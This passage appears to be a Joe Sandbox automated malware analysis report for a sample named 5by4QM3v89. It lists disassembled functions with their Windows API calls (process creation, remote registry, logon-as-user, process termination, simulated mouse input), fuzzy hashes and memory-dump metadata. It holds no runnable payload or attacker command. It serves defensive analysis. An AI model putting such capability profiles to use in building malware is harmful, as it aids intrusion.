                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 3567560977-0
                                                          • Opcode ID: 45d036f955753236cecd5ecac1648bad4e14b963bb0ccfd594e702202f0e6eff
                                                          • Instruction ID: 81bc892526e0153a587cb19eb0c1cb37a0143f1238eb04842704b55418999b0c
                                                          • Opcode Fuzzy Hash: 45d036f955753236cecd5ecac1648bad4e14b963bb0ccfd594e702202f0e6eff
                                                          • Instruction Fuzzy Hash: 73F090725097116AE637B776BC037CA2794EF0273CF214A2FF764CA9D2EF20894142A4
                                                          APIs
                                                          • _memset.LIBCMT ref: 0041B644
                                                          • _memset.LIBCMT ref: 0041B653
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00456F20,00456F64), ref: 0041B682
                                                          • CloseHandle.KERNEL32 ref: 0041B694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID: oE$doE
                                                          • API String ID: 3277943733-3208451510
                                                          • Opcode ID: 4674bae02336f59d96942ead4e0df6e11251f3ca0d47d7de3c53585c569c2e2f
                                                          • Instruction ID: f3e86ead181a1671e1603cf277aaa50415ffa44e67b3c896642c61f645bb7ae4
                                                          • Opcode Fuzzy Hash: 4674bae02336f59d96942ead4e0df6e11251f3ca0d47d7de3c53585c569c2e2f
                                                          • Instruction Fuzzy Hash: 75F05EB39403047AE6102761BC06FBB3A9CEB08396F418531BE09EA1A3D7759C00C7AC
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003B3F85), ref: 003B4085
                                                          • GetProcAddress.KERNEL32(00000000), ref: 003B408C
                                                          • EncodePointer.KERNEL32(00000000), ref: 003B4097
                                                          • DecodePointer.KERNEL32(003B3F85), ref: 003B40B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: 4e0b3c5239501934df64eea432319f869f3eb7b9a52c774327787d4b930eec41
                                                          • Instruction ID: c3579a5e86ef698a76866dabc573bc7fa0023249962e4fb74886e7d9180ba875
                                                          • Opcode Fuzzy Hash: 4e0b3c5239501934df64eea432319f869f3eb7b9a52c774327787d4b930eec41
                                                          • Instruction Fuzzy Hash: D4E09270691B00ABEA10AF71ED09B857AA5B714787F608135F611E10A2CFB68609EA1C
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3253778849-0
                                                          • Opcode ID: 930e372e5f39bfc8ea219d407a9ad98eb2a4a18274e6ba2047c3b3768861095b
                                                          • Instruction ID: 8770300e4e3ad2c438c5269e0f5a8b9d97f5f2aba51ca423e017e94efd42c62a
                                                          • Opcode Fuzzy Hash: 930e372e5f39bfc8ea219d407a9ad98eb2a4a18274e6ba2047c3b3768861095b
                                                          • Instruction Fuzzy Hash: DE617A3090065A9BCF07EF64CC82AFE37A9AF49308F044519FA59AF192EB35ED05CB50
                                                          APIs
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                            • Part of subcall function 00410E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040FDAD,?,?), ref: 00410E31
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004102BD
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004102FD
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00410320
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00410349
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041038C
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00410399
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                          • String ID:
                                                          • API String ID: 4046560759-0
                                                          • Opcode ID: 81d868107e9483471eff935589356c44cad2488c808150919b26d116d4266d3a
                                                          • Instruction ID: 2de3e3cd27ec9f1a07dae6581bd8ac972586ce2f994da47e37f2ae65e72eabac
                                                          • Opcode Fuzzy Hash: 81d868107e9483471eff935589356c44cad2488c808150919b26d116d4266d3a
                                                          • Instruction Fuzzy Hash: EF519D312082049FCB15EF64C845EAFBBE8FF89314F00492EF9558B2A1DB71E985CB56
                                                          APIs
                                                          • GetMenu.USER32(?), ref: 004157FB
                                                          • GetMenuItemCount.USER32(00000000), ref: 00415832
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0041585A
                                                          • GetMenuItemID.USER32(?,?), ref: 004158C9
                                                          • GetSubMenu.USER32(?,?), ref: 004158D7
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00415928
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostString
                                                          • String ID:
                                                          • API String ID: 650687236-0
                                                          • Opcode ID: da74c23c884a127c3df63c2900643b04a9dfac391c9937ebbb3adf2e9216ef97
                                                          • Instruction ID: aacfd582f4d89c544bc92e98f8be68fae06764676f79358ea67c80425a0279b6
                                                          • Opcode Fuzzy Hash: da74c23c884a127c3df63c2900643b04a9dfac391c9937ebbb3adf2e9216ef97
                                                          • Instruction Fuzzy Hash: 44517E71E00A15EFCF01EF64C845AEEB7B5EF48320F10406AE905BB351CB74AE828B95
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 003EEF06
                                                          • VariantClear.OLEAUT32(00000013), ref: 003EEF78
                                                          • VariantClear.OLEAUT32(00000000), ref: 003EEFD3
                                                          • _memmove.LIBCMT ref: 003EEFFD
                                                          • VariantClear.OLEAUT32(?), ref: 003EF04A
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003EF078
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                          • String ID:
                                                          • API String ID: 1101466143-0
                                                          • Opcode ID: 40c502a544740cc22a386b0c83ff7409be95348625f63fd1ae90f7abfc863474
                                                          • Instruction ID: 0eaf1d70dad044c270186126ad05e324e70318947851c8df0b81780a52fdb8f2
                                                          • Opcode Fuzzy Hash: 40c502a544740cc22a386b0c83ff7409be95348625f63fd1ae90f7abfc863474
                                                          • Instruction Fuzzy Hash: C5516AB5A00259EFCB14CF58C880AAAB7B8FF4C314B158669ED59DB341E375E911CFA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 003F2258
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F22A3
                                                          • IsMenu.USER32(00000000), ref: 003F22C3
                                                          • CreatePopupMenu.USER32 ref: 003F22F7
                                                          • GetMenuItemCount.USER32(000000FF), ref: 003F2355
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003F2386
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: c4bacf141a68e7e53866c1bcfe7a988054d3be1606bb502a4828bea0db1a10a7
                                                          • Instruction ID: b16f33840525694d6d293901e03cf0e9d0c87d7f030f863974a45bc931628b5c
                                                          • Opcode Fuzzy Hash: c4bacf141a68e7e53866c1bcfe7a988054d3be1606bb502a4828bea0db1a10a7
                                                          • Instruction Fuzzy Hash: 1951CFB460020DEFDF22CF68C888BBFBBF5AF05318F15462AEA519B291D3748904CB51
                                                          APIs
                                                            • Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623
                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0039179A
                                                          • GetWindowRect.USER32(?,?), ref: 003917FE
                                                          • ScreenToClient.USER32(?,?), ref: 0039181B
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0039182C
                                                          • EndPaint.USER32(?,?), ref: 00391876
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                          • String ID:
                                                          • API String ID: 1827037458-0
                                                          • Opcode ID: 0377e6a4135211448e82b73dfa624a4cab01703051edc718d17e064b72fa18af
                                                          • Instruction ID: 54e7250bf8eb66f5e8faf00aa7376a5bdf485926556a4c47ac44a77a45a04839
                                                          • Opcode Fuzzy Hash: 0377e6a4135211448e82b73dfa624a4cab01703051edc718d17e064b72fa18af
                                                          • Instruction Fuzzy Hash: BB41B330104701AFDB12EF25CC84FB67BE8EB55724F144679F9949B2A2C7319C4ADB61
                                                          APIs
                                                          • ShowWindow.USER32(004557B0,00000000,012E61C0,?,?,004557B0,?,0041B5A8,?,?), ref: 0041B712
                                                          • EnableWindow.USER32(00000000,00000000), ref: 0041B736
                                                          • ShowWindow.USER32(004557B0,00000000,012E61C0,?,?,004557B0,?,0041B5A8,?,?), ref: 0041B796
                                                          • ShowWindow.USER32(00000000,00000004,?,0041B5A8,?,?), ref: 0041B7A8
                                                          • EnableWindow.USER32(00000000,00000001), ref: 0041B7CC
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0041B7EF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 8cca49e53f167559861d31dbe7fa10499e17983c2fffa015b8642a07f57ea2b8
                                                          • Instruction ID: ea69bd5e91a865c7ea5399c56284b5dc1bae30e2683d23954f05196c5df905c5
                                                          • Opcode Fuzzy Hash: 8cca49e53f167559861d31dbe7fa10499e17983c2fffa015b8642a07f57ea2b8
                                                          • Instruction Fuzzy Hash: 43417334600240AFDB22CF24C599BD57BE1FF45314F1881BAE9688F6F2C735A896CB95
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00404E41,?,?,00000000,00000001), ref: 004070AC
                                                            • Part of subcall function 004039A0: GetWindowRect.USER32(?,?), ref: 004039B3
                                                          • GetDesktopWindow.USER32 ref: 004070D6
                                                          • GetWindowRect.USER32(00000000), ref: 004070DD
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0040710F
                                                            • Part of subcall function 003F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F52BC
                                                          • GetCursorPos.USER32(?), ref: 0040713B
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00407199
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: b476ea363858b1f90b9460677f42e3ffb6c172efb81f02c5d67aa11b2badf3f0
                                                          • Instruction ID: b4310704e763b6e8388dedb88c641206f8c1a909fc96352da2f73cc595e8a155
                                                          • Opcode Fuzzy Hash: b476ea363858b1f90b9460677f42e3ffb6c172efb81f02c5d67aa11b2badf3f0
                                                          • Instruction Fuzzy Hash: 5431B672505305ABD720DF14C845F9BB7AAFF88314F00092AF595AB2D1C774E90ACB96
                                                          APIs
                                                            • Part of subcall function 003E80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003E80C0
                                                            • Part of subcall function 003E80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003E80CA
                                                            • Part of subcall function 003E80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003E80D9
                                                            • Part of subcall function 003E80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003E80E0
                                                            • Part of subcall function 003E80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003E80F6
                                                          • GetLengthSid.ADVAPI32(?,00000000,003E842F), ref: 003E88CA
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003E88D6
                                                          • HeapAlloc.KERNEL32(00000000), ref: 003E88DD
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 003E88F6
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,003E842F), ref: 003E890A
                                                          • HeapFree.KERNEL32(00000000), ref: 003E8911
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: cf51fe9bab4a566d9ed626ffc7191e818ae582d992fe4f91b243838961b829ba
                                                          • Instruction ID: bb97725203161b5ac2f6667536819091e3ceb520cc210bcc9ae138bcd5689857
                                                          • Opcode Fuzzy Hash: cf51fe9bab4a566d9ed626ffc7191e818ae582d992fe4f91b243838961b829ba
                                                          • Instruction Fuzzy Hash: D511B131901619FFDB129FA5DC09BFE7BA8EB45311F118228F849D7151CB329D05DB60
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003E85E2
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 003E85E9
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003E85F8
                                                          • CloseHandle.KERNEL32(00000004), ref: 003E8603
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003E8632
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 003E8646
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: c59253046f27062cd6d5ce91f28f6d4bc6501a5e966ce6b746ebe65ccadcf015
                                                          • Instruction ID: 479d4460f7319180ed50ae0399d171eacb61236efd97eeec77ad477479da87d2
                                                          • Opcode Fuzzy Hash: c59253046f27062cd6d5ce91f28f6d4bc6501a5e966ce6b746ebe65ccadcf015
                                                          • Instruction Fuzzy Hash: 05115C7250024DAFDF02CFA5DD49BDE7BA9EF48304F058164FE08A21A0C7729E65DB60
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 003EB7B5
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 003EB7C6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003EB7CD
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 003EB7D5
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003EB7EC
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 003EB7FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 5789d4ee2991eb19fb35a16cab31b209b7a6beecd4f3b91dabb4ff085dee7d1c
                                                          • Instruction ID: cade32f2be2a1cdb6061859b7b670dc5659dd6b472534646e3b517ac5d9fcec0
                                                          • Opcode Fuzzy Hash: 5789d4ee2991eb19fb35a16cab31b209b7a6beecd4f3b91dabb4ff085dee7d1c
                                                          • Instruction Fuzzy Hash: 93018475E00219BBEF119BE69C45A9EBFB8EF48311F008075FA04A7291D6319C01CF90
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B0193
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 003B019B
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003B01A6
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B01B1
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 003B01B9
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B01C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: db753968343c5472feb40d9fc5be51bb151c6570d20d212388ca5d50601676a3
                                                          • Instruction ID: 907b5588f13e5967f1dcc7a959c4a545a7ff8edc869fb56bf8fb5c03ed9e3441
                                                          • Opcode Fuzzy Hash: db753968343c5472feb40d9fc5be51bb151c6570d20d212388ca5d50601676a3
                                                          • Instruction Fuzzy Hash: 25016CB0941B597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003F53F9
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003F540F
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 003F541E
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F542D
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F5437
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F543E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: ba716e968ddf962679a238590acfb28780638a9fe650ff83199b2aad99b6428f
